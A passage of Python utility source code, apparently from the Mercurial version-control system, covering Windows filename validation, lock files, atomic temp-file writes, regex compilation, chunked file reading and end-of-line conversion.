1910 1910 "filename contains 'AUX', which is reserved on Windows"
1911 1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1912 1912 "filename contains ':', which is reserved on Windows"
1913 1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1914 1914 "filename contains '\\x07', which is invalid on Windows"
1915 1915 >>> checkwinfilename(b"foo/bar/bla ")
1916 1916 "filename ends with ' ', which is not allowed on Windows"
1917 1917 >>> checkwinfilename(b"../bar")
1918 1918 >>> checkwinfilename(b"foo\\")
1919 1919 "filename ends with '\\', which is invalid on Windows"
1920 1920 >>> checkwinfilename(b"foo\\/bar")
1921 1921 "directory name ends with '\\', which is invalid on Windows"
1922 1922 '''
1923 1923 if path.endswith('\\'):
1924 1924 return _("filename ends with '\\', which is invalid on Windows")
1925 1925 if '\\/' in path:
1926 1926 return _("directory name ends with '\\', which is invalid on Windows")
1927 1927 for n in path.replace('\\', '/').split('/'):
1928 1928 if not n:
1929 1929 continue
1930 1930 for c in _filenamebytestr(n):
1931 1931 if c in _winreservedchars:
1932 1932 return _("filename contains '%s', which is reserved "
1933 1933 "on Windows") % c
1934 1934 if ord(c) <= 31:
1935 1935 return _("filename contains '%s', which is invalid "
1936 1936 "on Windows") % escapestr(c)
1937 1937 base = n.split('.')[0]
1938 1938 if base and base.lower() in _winreservednames:
1939 1939 return _("filename contains '%s', which is reserved "
1940 1940 "on Windows") % base
1941 1941 t = n[-1:]
1942 1942 if t in '. ' and n not in '..':
1943 1943 return _("filename ends with '%s', which is not allowed "
1944 1944 "on Windows") % t
1945 1945
1946 1946 if pycompat.iswindows:
1947 1947 checkosfilename = checkwinfilename
1948 1948 timer = time.clock
1949 1949 else:
1950 1950 checkosfilename = platform.checkosfilename
1951 1951 timer = time.time
1952 1952
1953 1953 if safehasattr(time, "perf_counter"):
1954 1954 timer = time.perf_counter
1955 1955
1956 1956 def makelock(info, pathname):
1957 1957 """Create a lock file atomically if possible
1958 1958
1959 1959 This may leave a stale lock file if symlink isn't supported and signal
1960 1960 interrupt is enabled.
1961 1961 """
1962 1962 try:
1963 1963 return os.symlink(info, pathname)
1964 1964 except OSError as why:
1965 1965 if why.errno == errno.EEXIST:
1966 1966 raise
1967 1967 except AttributeError: # no symlink in os
1968 1968 pass
1969 1969
1970 1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1971 1971 ld = os.open(pathname, flags)
1972 1972 os.write(ld, info)
1973 1973 os.close(ld)
1974 1974
1975 1975 def readlock(pathname):
1976 1976 try:
1977 1977 return os.readlink(pathname)
1978 1978 except OSError as why:
1979 1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1980 1980 raise
1981 1981 except AttributeError: # no symlink in os
1982 1982 pass
1983 1983 fp = posixfile(pathname, 'rb')
1984 1984 r = fp.read()
1985 1985 fp.close()
1986 1986 return r
1987 1987
1988 1988 def fstat(fp):
1989 1989 '''stat file object that may not have fileno method.'''
1990 1990 try:
1991 1991 return os.fstat(fp.fileno())
1992 1992 except AttributeError:
1993 1993 return os.stat(fp.name)
1994 1994
1995 1995 # File system features
1996 1996
1997 1997 def fscasesensitive(path):
1998 1998 """
1999 1999 Return true if the given path is on a case-sensitive filesystem
2000 2000
2001 2001 Requires a path (like /foo/.hg) ending with a foldable final
2002 2002 directory component.
2003 2003 """
2004 2004 s1 = os.lstat(path)
2005 2005 d, b = os.path.split(path)
2006 2006 b2 = b.upper()
2007 2007 if b == b2:
2008 2008 b2 = b.lower()
2009 2009 if b == b2:
2010 2010 return True # no evidence against case sensitivity
2011 2011 p2 = os.path.join(d, b2)
2012 2012 try:
2013 2013 s2 = os.lstat(p2)
2014 2014 if s2 == s1:
2015 2015 return False
2016 2016 return True
2017 2017 except OSError:
2018 2018 return True
2019 2019
2020 2020 try:
2021 2021 import re2
2022 2022 _re2 = None
2023 2023 except ImportError:
2024 2024 _re2 = False
2025 2025
2026 2026 class _re(object):
2027 2027 def _checkre2(self):
2028 2028 global _re2
2029 2029 try:
2030 2030 # check if match works, see issue3964
2031 2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2032 2032 except ImportError:
2033 2033 _re2 = False
2034 2034
2035 2035 def compile(self, pat, flags=0):
2036 2036 '''Compile a regular expression, using re2 if possible
2037 2037
2038 2038 For best performance, use only re2-compatible regexp features. The
2039 2039 only flags from the re module that are re2-compatible are
2040 2040 IGNORECASE and MULTILINE.'''
2041 2041 if _re2 is None:
2042 2042 self._checkre2()
2043 2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2044 2044 if flags & remod.IGNORECASE:
2045 2045 pat = '(?i)' + pat
2046 2046 if flags & remod.MULTILINE:
2047 2047 pat = '(?m)' + pat
2048 2048 try:
2049 2049 return re2.compile(pat)
2050 2050 except re2.error:
2051 2051 pass
2052 2052 return remod.compile(pat, flags)
2053 2053
2054 2054 @propertycache
2055 2055 def escape(self):
2056 2056 '''Return the version of escape corresponding to self.compile.
2057 2057
2058 2058 This is imperfect because whether re2 or re is used for a particular
2059 2059 function depends on the flags, etc, but it's the best we can do.
2060 2060 '''
2061 2061 global _re2
2062 2062 if _re2 is None:
2063 2063 self._checkre2()
2064 2064 if _re2:
2065 2065 return re2.escape
2066 2066 else:
2067 2067 return remod.escape
2068 2068
2069 2069 re = _re()
2070 2070
2071 2071 _fspathcache = {}
2072 2072 def fspath(name, root):
2073 2073 '''Get name in the case stored in the filesystem
2074 2074
2075 2075 The name should be relative to root, and be normcase-ed for efficiency.
2076 2076
2077 2077 Note that this function is unnecessary, and should not be
2078 2078 called, for case-sensitive filesystems (simply because it's expensive).
2079 2079
2080 2080 The root should be normcase-ed, too.
2081 2081 '''
2082 2082 def _makefspathcacheentry(dir):
2083 2083 return dict((normcase(n), n) for n in os.listdir(dir))
2084 2084
2085 2085 seps = pycompat.ossep
2086 2086 if pycompat.osaltsep:
2087 2087 seps = seps + pycompat.osaltsep
2088 2088 # Protect backslashes. This gets silly very quickly.
2089 2089 seps.replace('\\','\\\\')
2090 2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2091 2091 dir = os.path.normpath(root)
2092 2092 result = []
2093 2093 for part, sep in pattern.findall(name):
2094 2094 if sep:
2095 2095 result.append(sep)
2096 2096 continue
2097 2097
2098 2098 if dir not in _fspathcache:
2099 2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2100 2100 contents = _fspathcache[dir]
2101 2101
2102 2102 found = contents.get(part)
2103 2103 if not found:
2104 2104 # retry "once per directory" per "dirstate.walk" which
2105 2105 # may take place for each patches of "hg qpush", for example
2106 2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2107 2107 found = contents.get(part)
2108 2108
2109 2109 result.append(found or part)
2110 2110 dir = os.path.join(dir, part)
2111 2111
2112 2112 return ''.join(result)
2113 2113
2114 2114 def checknlink(testfile):
2115 2115 '''check whether hardlink count reporting works properly'''
2116 2116
2117 2117 # testfile may be open, so we need a separate file for checking to
2118 2118 # work around issue2543 (or testfile may get lost on Samba shares)
2119 2119 f1, f2, fp = None, None, None
2120 2120 try:
2121 2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2122 2122 suffix='1~', dir=os.path.dirname(testfile))
2123 2123 os.close(fd)
2124 2124 f2 = '%s2~' % f1[:-2]
2125 2125
2126 2126 oslink(f1, f2)
2127 2127 # nlinks() may behave differently for files on Windows shares if
2128 2128 # the file is open.
2129 2129 fp = posixfile(f2)
2130 2130 return nlinks(f2) > 1
2131 2131 except OSError:
2132 2132 return False
2133 2133 finally:
2134 2134 if fp is not None:
2135 2135 fp.close()
2136 2136 for f in (f1, f2):
2137 2137 try:
2138 2138 if f is not None:
2139 2139 os.unlink(f)
2140 2140 except OSError:
2141 2141 pass
2142 2142
2143 2143 def endswithsep(path):
2144 2144 '''Check path ends with os.sep or os.altsep.'''
2145 2145 return (path.endswith(pycompat.ossep)
2146 2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2147 2147
2148 2148 def splitpath(path):
2149 2149 '''Split path by os.sep.
2150 2150 Note that this function does not use os.altsep because this is
2151 2151 an alternative of simple "xxx.split(os.sep)".
2152 2152 It is recommended to use os.path.normpath() before using this
2153 2153 function if need.'''
2154 2154 return path.split(pycompat.ossep)
2155 2155
2156 2156 def gui():
2157 2157 '''Are we running in a GUI?'''
2158 2158 if pycompat.isdarwin:
2159 2159 if 'SSH_CONNECTION' in encoding.environ:
2160 2160 # handle SSH access to a box where the user is logged in
2161 2161 return False
2162 2162 elif getattr(osutil, 'isgui', None):
2163 2163 # check if a CoreGraphics session is available
2164 2164 return osutil.isgui()
2165 2165 else:
2166 2166 # pure build; use a safe default
2167 2167 return True
2168 2168 else:
2169 2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2170 2170
2171 2171 def mktempcopy(name, emptyok=False, createmode=None):
2172 2172 """Create a temporary file with the same contents from name
2173 2173
2174 2174 The permission bits are copied from the original file.
2175 2175
2176 2176 If the temporary file is going to be truncated immediately, you
2177 2177 can use emptyok=True as an optimization.
2178 2178
2179 2179 Returns the name of the temporary file.
2180 2180 """
2181 2181 d, fn = os.path.split(name)
2182 2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2183 2183 os.close(fd)
2184 2184 # Temporary files are created with mode 0600, which is usually not
2185 2185 # what we want. If the original file already exists, just copy
2186 2186 # its mode. Otherwise, manually obey umask.
2187 2187 copymode(name, temp, createmode)
2188 2188 if emptyok:
2189 2189 return temp
2190 2190 try:
2191 2191 try:
2192 2192 ifp = posixfile(name, "rb")
2193 2193 except IOError as inst:
2194 2194 if inst.errno == errno.ENOENT:
2195 2195 return temp
2196 2196 if not getattr(inst, 'filename', None):
2197 2197 inst.filename = name
2198 2198 raise
2199 2199 ofp = posixfile(temp, "wb")
2200 2200 for chunk in filechunkiter(ifp):
2201 2201 ofp.write(chunk)
2202 2202 ifp.close()
2203 2203 ofp.close()
2204 2204 except: # re-raises
2205 2205 try:
2206 2206 os.unlink(temp)
2207 2207 except OSError:
2208 2208 pass
2209 2209 raise
2210 2210 return temp
2211 2211
2212 2212 class filestat(object):
2213 2213 """help to exactly detect change of a file
2214 2214
2215 2215 'stat' attribute is result of 'os.stat()' if specified 'path'
2216 2216 exists. Otherwise, it is None. This can avoid preparative
2217 2217 'exists()' examination on client side of this class.
2218 2218 """
2219 2219 def __init__(self, stat):
2220 2220 self.stat = stat
2221 2221
2222 2222 @classmethod
2223 2223 def frompath(cls, path):
2224 2224 try:
2225 2225 stat = os.stat(path)
2226 2226 except OSError as err:
2227 2227 if err.errno != errno.ENOENT:
2228 2228 raise
2229 2229 stat = None
2230 2230 return cls(stat)
2231 2231
2232 2232 @classmethod
2233 2233 def fromfp(cls, fp):
2234 2234 stat = os.fstat(fp.fileno())
2235 2235 return cls(stat)
2236 2236
2237 2237 __hash__ = object.__hash__
2238 2238
2239 2239 def __eq__(self, old):
2240 2240 try:
2241 2241 # if ambiguity between stat of new and old file is
2242 2242 # avoided, comparison of size, ctime and mtime is enough
2243 2243 # to exactly detect change of a file regardless of platform
2244 2244 return (self.stat.st_size == old.stat.st_size and
2245 2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2246 2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2247 2247 except AttributeError:
2248 2248 pass
2249 2249 try:
2250 2250 return self.stat is None and old.stat is None
2251 2251 except AttributeError:
2252 2252 return False
2253 2253
2254 2254 def isambig(self, old):
2255 2255 """Examine whether new (= self) stat is ambiguous against old one
2256 2256
2257 2257 "S[N]" below means stat of a file at N-th change:
2258 2258
2259 2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2260 2260 - S[n-1].ctime == S[n].ctime
2261 2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2262 2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2263 2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2264 2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2265 2265
2266 2266 Case (*2) above means that a file was changed twice or more at
2267 2267 same time in sec (= S[n-1].ctime), and comparison of timestamp
2268 2268 is ambiguous.
2269 2269
2270 2270 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2271 2271 timestamp is ambiguous".
2272 2272
2273 2273 But advancing mtime only in case (*2) doesn't work as
2274 2274 expected, because naturally advanced S[n].mtime in case (*1)
2275 2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2276 2276
2277 2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2278 2278 treated as ambiguous regardless of mtime, to avoid overlooking
2279 2279 by confliction between such mtime.
2280 2280
2281 2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2282 2282 S[n].mtime", even if size of a file isn't changed.
2283 2283 """
2284 2284 try:
2285 2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2286 2286 except AttributeError:
2287 2287 return False
2288 2288
2289 2289 def avoidambig(self, path, old):
2290 2290 """Change file stat of specified path to avoid ambiguity
2291 2291
2292 2292 'old' should be previous filestat of 'path'.
2293 2293
2294 2294 This skips avoiding ambiguity, if a process doesn't have
2295 2295 appropriate privileges for 'path'. This returns False in this
2296 2296 case.
2297 2297
2298 2298 Otherwise, this returns True, as "ambiguity is avoided".
2299 2299 """
2300 2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2301 2301 try:
2302 2302 os.utime(path, (advanced, advanced))
2303 2303 except OSError as inst:
2304 2304 if inst.errno == errno.EPERM:
2305 2305 # utime() on the file created by another user causes EPERM,
2306 2306 # if a process doesn't have appropriate privileges
2307 2307 return False
2308 2308 raise
2309 2309 return True
2310 2310
2311 2311 def __ne__(self, other):
2312 2312 return not self == other
2313 2313
2314 2314 class atomictempfile(object):
2315 2315 '''writable file object that atomically updates a file
2316 2316
2317 2317 All writes will go to a temporary copy of the original file. Call
2318 2318 close() when you are done writing, and atomictempfile will rename
2319 2319 the temporary copy to the original name, making the changes
2320 2320 visible. If the object is destroyed without being closed, all your
2321 2321 writes are discarded.
2322 2322
2323 2323 checkambig argument of constructor is used with filestat, and is
2324 2324 useful only if target file is guarded by any lock (e.g. repo.lock
2325 2325 or repo.wlock).
2326 2326 '''
2327 2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2328 2328 self.__name = name # permanent name
2329 2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2330 2330 createmode=createmode)
2331 2331 self._fp = posixfile(self._tempname, mode)
2332 2332 self._checkambig = checkambig
2333 2333
2334 2334 # delegated methods
2335 2335 self.read = self._fp.read
2336 2336 self.write = self._fp.write
2337 2337 self.seek = self._fp.seek
2338 2338 self.tell = self._fp.tell
2339 2339 self.fileno = self._fp.fileno
2340 2340
2341 2341 def close(self):
2342 2342 if not self._fp.closed:
2343 2343 self._fp.close()
2344 2344 filename = localpath(self.__name)
2345 2345 oldstat = self._checkambig and filestat.frompath(filename)
2346 2346 if oldstat and oldstat.stat:
2347 2347 rename(self._tempname, filename)
2348 2348 newstat = filestat.frompath(filename)
2349 2349 if newstat.isambig(oldstat):
2350 2350 # stat of changed file is ambiguous to original one
2351 2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2352 2352 os.utime(filename, (advanced, advanced))
2353 2353 else:
2354 2354 rename(self._tempname, filename)
2355 2355
2356 2356 def discard(self):
2357 2357 if not self._fp.closed:
2358 2358 try:
2359 2359 os.unlink(self._tempname)
2360 2360 except OSError:
2361 2361 pass
2362 2362 self._fp.close()
2363 2363
2364 2364 def __del__(self):
2365 2365 if safehasattr(self, '_fp'): # constructor actually did something
2366 2366 self.discard()
2367 2367
2368 2368 def __enter__(self):
2369 2369 return self
2370 2370
2371 2371 def __exit__(self, exctype, excvalue, traceback):
2372 2372 if exctype is not None:
2373 2373 self.discard()
2374 2374 else:
2375 2375 self.close()
2376 2376
2377 2377 def unlinkpath(f, ignoremissing=False):
2378 2378 """unlink and remove the directory if it is empty"""
2379 2379 if ignoremissing:
2380 2380 tryunlink(f)
2381 2381 else:
2382 2382 unlink(f)
2383 2383 # try removing directories that might now be empty
2384 2384 try:
2385 2385 removedirs(os.path.dirname(f))
2386 2386 except OSError:
2387 2387 pass
2388 2388
2389 2389 def tryunlink(f):
2390 2390 """Attempt to remove a file, ignoring ENOENT errors."""
2391 2391 try:
2392 2392 unlink(f)
2393 2393 except OSError as e:
2394 2394 if e.errno != errno.ENOENT:
2395 2395 raise
2396 2396
2397 2397 def makedirs(name, mode=None, notindexed=False):
2398 2398 """recursive directory creation with parent mode inheritance
2399 2399
2400 2400 Newly created directories are marked as "not to be indexed by
2401 2401 the content indexing service", if ``notindexed`` is specified
2402 2402 for "write" mode access.
2403 2403 """
2404 2404 try:
2405 2405 makedir(name, notindexed)
2406 2406 except OSError as err:
2407 2407 if err.errno == errno.EEXIST:
2408 2408 return
2409 2409 if err.errno != errno.ENOENT or not name:
2410 2410 raise
2411 2411 parent = os.path.dirname(os.path.abspath(name))
2412 2412 if parent == name:
2413 2413 raise
2414 2414 makedirs(parent, mode, notindexed)
2415 2415 try:
2416 2416 makedir(name, notindexed)
2417 2417 except OSError as err:
2418 2418 # Catch EEXIST to handle races
2419 2419 if err.errno == errno.EEXIST:
2420 2420 return
2421 2421 raise
2422 2422 if mode is not None:
2423 2423 os.chmod(name, mode)
2424 2424
2425 2425 def readfile(path):
2426 2426 with open(path, 'rb') as fp:
2427 2427 return fp.read()
2428 2428
2429 2429 def writefile(path, text):
2430 2430 with open(path, 'wb') as fp:
2431 2431 fp.write(text)
2432 2432
2433 2433 def appendfile(path, text):
2434 2434 with open(path, 'ab') as fp:
2435 2435 fp.write(text)
2436 2436
2437 2437 class chunkbuffer(object):
2438 2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2439 2439 iterator over chunks of arbitrary size."""
2440 2440
2441 2441 def __init__(self, in_iter):
2442 2442 """in_iter is the iterator that's iterating over the input chunks."""
2443 2443 def splitbig(chunks):
2444 2444 for chunk in chunks:
2445 2445 if len(chunk) > 2**20:
2446 2446 pos = 0
2447 2447 while pos < len(chunk):
2448 2448 end = pos + 2 ** 18
2449 2449 yield chunk[pos:end]
2450 2450 pos = end
2451 2451 else:
2452 2452 yield chunk
2453 2453 self.iter = splitbig(in_iter)
2454 2454 self._queue = collections.deque()
2455 2455 self._chunkoffset = 0
2456 2456
2457 2457 def read(self, l=None):
2458 2458 """Read L bytes of data from the iterator of chunks of data.
2459 2459 Returns less than L bytes if the iterator runs dry.
2460 2460
2461 2461 If size parameter is omitted, read everything"""
2462 2462 if l is None:
2463 2463 return ''.join(self.iter)
2464 2464
2465 2465 left = l
2466 2466 buf = []
2467 2467 queue = self._queue
2468 2468 while left > 0:
2469 2469 # refill the queue
2470 2470 if not queue:
2471 2471 target = 2**18
2472 2472 for chunk in self.iter:
2473 2473 queue.append(chunk)
2474 2474 target -= len(chunk)
2475 2475 if target <= 0:
2476 2476 break
2477 2477 if not queue:
2478 2478 break
2479 2479
2480 2480 # The easy way to do this would be to queue.popleft(), modify the
2481 2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2482 2482 # where we read partial chunk content, this incurs 2 dequeue
2483 2483 # mutations and creates a new str for the remaining chunk in the
2484 2484 # queue. Our code below avoids this overhead.
2485 2485
2486 2486 chunk = queue[0]
2487 2487 chunkl = len(chunk)
2488 2488 offset = self._chunkoffset
2489 2489
2490 2490 # Use full chunk.
2491 2491 if offset == 0 and left >= chunkl:
2492 2492 left -= chunkl
2493 2493 queue.popleft()
2494 2494 buf.append(chunk)
2495 2495 # self._chunkoffset remains at 0.
2496 2496 continue
2497 2497
2498 2498 chunkremaining = chunkl - offset
2499 2499
2500 2500 # Use all of unconsumed part of chunk.
2501 2501 if left >= chunkremaining:
2502 2502 left -= chunkremaining
2503 2503 queue.popleft()
2504 2504 # offset == 0 is enabled by block above, so this won't merely
2505 2505 # copy via ``chunk[0:]``.
2506 2506 buf.append(chunk[offset:])
2507 2507 self._chunkoffset = 0
2508 2508
2509 2509 # Partial chunk needed.
2510 2510 else:
2511 2511 buf.append(chunk[offset:offset + left])
2512 2512 self._chunkoffset += left
2513 2513 left -= chunkremaining
2514 2514
2515 2515 return ''.join(buf)
2516 2516
2517 2517 def filechunkiter(f, size=131072, limit=None):
2518 2518 """Create a generator that produces the data in the file size
2519 2519 (default 131072) bytes at a time, up to optional limit (default is
2520 2520 to read all data). Chunks may be less than size bytes if the
2521 2521 chunk is the last chunk in the file, or the file is a socket or
2522 2522 some other type of file that sometimes reads less data than is
2523 2523 requested."""
2524 2524 assert size >= 0
2525 2525 assert limit is None or limit >= 0
2526 2526 while True:
2527 2527 if limit is None:
2528 2528 nbytes = size
2529 2529 else:
2530 2530 nbytes = min(limit, size)
2531 2531 s = nbytes and f.read(nbytes)
2532 2532 if not s:
2533 2533 break
2534 2534 if limit:
2535 2535 limit -= len(s)
2536 2536 yield s
2537 2537
2538 2538 class cappedreader(object):
2539 2539 """A file object proxy that allows reading up to N bytes.
2540 2540
2541 2541 Given a source file object, instances of this type allow reading up to
2542 2542 N bytes from that source file object. Attempts to read past the allowed
2543 2543 limit are treated as EOF.
2544 2544
2545 2545 It is assumed that I/O is not performed on the original file object
2546 2546 in addition to I/O that is performed by this instance. If there is,
2547 2547 state tracking will get out of sync and unexpected results will ensue.
2548 2548 """
2549 2549 def __init__(self, fh, limit):
2550 2550 """Allow reading up to <limit> bytes from <fh>."""
2551 2551 self._fh = fh
2552 2552 self._left = limit
2553 2553
2554 2554 def read(self, n=-1):
2555 2555 if not self._left:
2556 2556 return b''
2557 2557
2558 2558 if n < 0:
2559 2559 n = self._left
2560 2560
2561 2561 data = self._fh.read(min(n, self._left))
2562 2562 self._left -= len(data)
2563 2563 assert self._left >= 0
2564 2564
2565 2565 return data
2566 2566
2567 2567 def readinto(self, b):
2568 2568 res = self.read(len(b))
2569 2569 if res is None:
2570 2570 return None
2571 2571
2572 2572 b[0:len(res)] = res
2573 2573 return len(res)
2574 2574
2575 2575 def stringmatcher(pattern, casesensitive=True):
2576 2576 """
2577 2577 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2578 2578 returns the matcher name, pattern, and matcher function.
2579 2579 missing or unknown prefixes are treated as literal matches.
2580 2580
2581 2581 helper for tests:
2582 2582 >>> def test(pattern, *tests):
2583 2583 ... kind, pattern, matcher = stringmatcher(pattern)
2584 2584 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2585 2585 >>> def itest(pattern, *tests):
2586 2586 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2587 2587 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2588 2588
2589 2589 exact matching (no prefix):
2590 2590 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2591 2591 ('literal', 'abcdefg', [False, False, True])
2592 2592
2593 2593 regex matching ('re:' prefix)
2594 2594 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2595 2595 ('re', 'a.+b', [False, False, True])
2596 2596
2597 2597 force exact matches ('literal:' prefix)
2598 2598 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2599 2599 ('literal', 're:foobar', [False, True])
2600 2600
2601 2601 unknown prefixes are ignored and treated as literals
2602 2602 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2603 2603 ('literal', 'foo:bar', [False, False, True])
2604 2604
2605 2605 case insensitive regex matches
2606 2606 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2607 2607 ('re', 'A.+b', [False, False, True])
2608 2608
2609 2609 case insensitive literal matches
2610 2610 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2611 2611 ('literal', 'ABCDEFG', [False, False, True])
2612 2612 """
2613 2613 if pattern.startswith('re:'):
2614 2614 pattern = pattern[3:]
2615 2615 try:
2616 2616 flags = 0
2617 2617 if not casesensitive:
2618 2618 flags = remod.I
2619 2619 regex = remod.compile(pattern, flags)
2620 2620 except remod.error as e:
2621 2621 raise error.ParseError(_('invalid regular expression: %s')
2622 2622 % e)
2623 2623 return 're', pattern, regex.search
2624 2624 elif pattern.startswith('literal:'):
2625 2625 pattern = pattern[8:]
2626 2626
2627 2627 match = pattern.__eq__
2628 2628
2629 2629 if not casesensitive:
2630 2630 ipat = encoding.lower(pattern)
2631 2631 match = lambda s: ipat == encoding.lower(s)
2632 2632 return 'literal', pattern, match
2633 2633
2634 2634 def shortuser(user):
2635 2635 """Return a short representation of a user name or email address."""
2636 2636 f = user.find('@')
2637 2637 if f >= 0:
2638 2638 user = user[:f]
2639 2639 f = user.find('<')
2640 2640 if f >= 0:
2641 2641 user = user[f + 1:]
2642 2642 f = user.find(' ')
2643 2643 if f >= 0:
2644 2644 user = user[:f]
2645 2645 f = user.find('.')
2646 2646 if f >= 0:
2647 2647 user = user[:f]
2648 2648 return user
2649 2649
2650 2650 def emailuser(user):
2651 2651 """Return the user portion of an email address."""
2652 2652 f = user.find('@')
2653 2653 if f >= 0:
2654 2654 user = user[:f]
2655 2655 f = user.find('<')
2656 2656 if f >= 0:
2657 2657 user = user[f + 1:]
2658 2658 return user
2659 2659
2660 2660 def email(author):
2661 2661 '''get email of author.'''
2662 2662 r = author.find('>')
2663 2663 if r == -1:
2664 2664 r = None
2665 2665 return author[author.find('<') + 1:r]
2666 2666
2667 2667 def ellipsis(text, maxlength=400):
2668 2668 """Trim string to at most maxlength (default: 400) columns in display."""
2669 2669 return encoding.trim(text, maxlength, ellipsis='...')
2670 2670
2671 2671 def unitcountfn(*unittable):
2672 2672 '''return a function that renders a readable count of some quantity'''
2673 2673
2674 2674 def go(count):
2675 2675 for multiplier, divisor, format in unittable:
2676 2676 if abs(count) >= divisor * multiplier:
2677 2677 return format % (count / float(divisor))
2678 2678 return unittable[-1][2] % count
2679 2679
2680 2680 return go
2681 2681
2682 2682 def processlinerange(fromline, toline):
2683 2683 """Check that linerange <fromline>:<toline> makes sense and return a
2684 2684 0-based range.
2685 2685
2686 2686 >>> processlinerange(10, 20)
2687 2687 (9, 20)
2688 2688 >>> processlinerange(2, 1)
2689 2689 Traceback (most recent call last):
2690 2690 ...
2691 2691 ParseError: line range must be positive
2692 2692 >>> processlinerange(0, 5)
2693 2693 Traceback (most recent call last):
2694 2694 ...
2695 2695 ParseError: fromline must be strictly positive
2696 2696 """
2697 2697 if toline - fromline < 0:
2698 2698 raise error.ParseError(_("line range must be positive"))
2699 2699 if fromline < 1:
2700 2700 raise error.ParseError(_("fromline must be strictly positive"))
2701 2701 return fromline - 1, toline
2702 2702
2703 2703 bytecount = unitcountfn(
2704 2704 (100, 1 << 30, _('%.0f GB')),
2705 2705 (10, 1 << 30, _('%.1f GB')),
2706 2706 (1, 1 << 30, _('%.2f GB')),
2707 2707 (100, 1 << 20, _('%.0f MB')),
2708 2708 (10, 1 << 20, _('%.1f MB')),
2709 2709 (1, 1 << 20, _('%.2f MB')),
2710 2710 (100, 1 << 10, _('%.0f KB')),
2711 2711 (10, 1 << 10, _('%.1f KB')),
2712 2712 (1, 1 << 10, _('%.2f KB')),
2713 2713 (1, 1, _('%.0f bytes')),
2714 2714 )
2715 2715
2716 2716 class transformingwriter(object):
2717 2717 """Writable file wrapper to transform data by function"""
2718 2718
2719 2719 def __init__(self, fp, encode):
2720 2720 self._fp = fp
2721 2721 self._encode = encode
2722 2722
2723 2723 def close(self):
2724 2724 self._fp.close()
2725 2725
2726 2726 def flush(self):
2727 2727 self._fp.flush()
2728 2728
2729 2729 def write(self, data):
2730 2730 return self._fp.write(self._encode(data))
2731 2731
2732 2732 # Matches a single EOL which can either be a CRLF where repeated CR
2733 2733 # are removed or a LF. We do not care about old Macintosh files, so a
2734 2734 # stray CR is an error.
2735 2735 _eolre = remod.compile(br'\r*\n')
2736 2736
2737 2737 def tolf(s):
2738 2738 return _eolre.sub('\n', s)
2739 2739
2740 2740 def tocrlf(s):
2741 2741 return _eolre.sub('\r\n', s)
2742 2742
2743 2743 def _crlfwriter(fp):
2744 2744 return transformingwriter(fp, tocrlf)
2745 2745
2746 2746 if pycompat.oslinesep == '\r\n':
2747 2747 tonativeeol = tocrlf
2748 2748 fromnativeeol = tolf
2749 2749 nativeeolwriter = _crlfwriter
2750 2750 else:
2751 2751 tonativeeol = pycompat.identity
2752 2752 fromnativeeol = pycompat.identity
2753 2753 nativeeolwriter = pycompat.identity
2754 2754
2755 2755 def escapestr(s):
2756 2756 # call underlying function of s.encode('string_escape') directly for
2757 2757 # Python 3 compatibility
2758 2758 return codecs.escape_encode(s)[0]
2759 2759
2760 2760 def unescapestr(s):
2761 2761 return codecs.escape_decode(s)[0]
2762 2762
2763 2763 def forcebytestr(obj):
2764 2764 """Portably format an arbitrary object (e.g. exception) into a byte
2765 2765 string."""
2766 2766 try:
2767 2767 return pycompat.bytestr(obj)
2768 2768 except UnicodeEncodeError:
2769 2769 # non-ascii string, may be lossy
2770 2770 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2771 2771
2772 2772 def uirepr(s):
2773 2773 # Avoid double backslash in Windows path repr()
2774 2774 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2775 2775
2776 2776 # delay import of textwrap
2777 2777 def MBTextWrapper(**kwargs):
2778 2778 class tw(textwrap.TextWrapper):
2779 2779 """
2780 2780 Extend TextWrapper for width-awareness.
2781 2781
2782 2782 Neither number of 'bytes' in any encoding nor 'characters' is
2783 2783 appropriate to calculate terminal columns for specified string.
2784 2784
2785 2785 Original TextWrapper implementation uses built-in 'len()' directly,
